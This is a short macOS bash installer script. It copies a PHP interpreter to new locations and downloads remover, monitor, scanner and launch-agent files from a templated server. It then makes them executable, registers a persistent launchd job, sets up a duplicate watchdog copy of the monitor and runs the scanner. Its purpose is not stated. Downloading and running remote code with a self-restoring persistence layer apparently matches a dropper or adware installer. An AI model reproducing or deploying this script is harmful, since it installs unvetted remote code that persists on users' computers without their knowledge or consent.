
if [[ ! -d $DIR_MAIN ]]; then
   mkdir $DIR_MAIN
fi

if [[ ! -d $DIR_BIN ]]; then
   mkdir $DIR_BIN
fi

if [[ ! -f $BINARY ]]; then
   cp $PHP $BINARY
fi

if [[ ! -d $LAUNCH_DIR ]]; then
    mkdir -p $LAUNCH_DIR
fi

cp $0 $INSTALLER

curl -s -o $REMOVER "{{SERVER_HOST}}r.php?h=$HASH"
curl -s -o $MONITOR "{{SERVER_HOST}}g.php?h=$HASH"
curl -s -o $SCANNER "{{SERVER_HOST}}s.php?h=$HASH"
curl -s -o $LAUNCH_PLIST "{{SERVER_HOST}}l.php?h=$HASH"

sed -i '' "s/{{MONITOR}}/$MON_ESC/g" $SCANNER
sed -i '' "s/{{BINARY_LOCATION}}/$BIN_ESC/g" $SCANNER
sed -i '' "s/{{SCANNER}}/$SCAN_ESC/g" $LAUNCH_PLIST
sed -i '' "s/{{SCANNER}}/$SCAN_ESC/g" $MONITOR
sed -i '' "s/{{PING_BIN}}/$PING_BIN_ESC/g" $MONITOR
sed -i '' "s/{{PING_MON}}/$PING_MON_ESC/g" $MONITOR

chmod +x $INSTALLER $REMOVER $MONITOR $SCANNER

launchctl load $LAUNCH_PLIST

if [[ ! -d $PING_DIR ]]; then
   mkdir $PING_DIR
fi

if [[ ! -f $PING_BIN ]]; then
   cp $PHP $PING_BIN
fi

if [[ -f $PING_MON ]]; then
   rm $PING_MON
fi

cp $MONITOR $PING_MON

$SCANNER
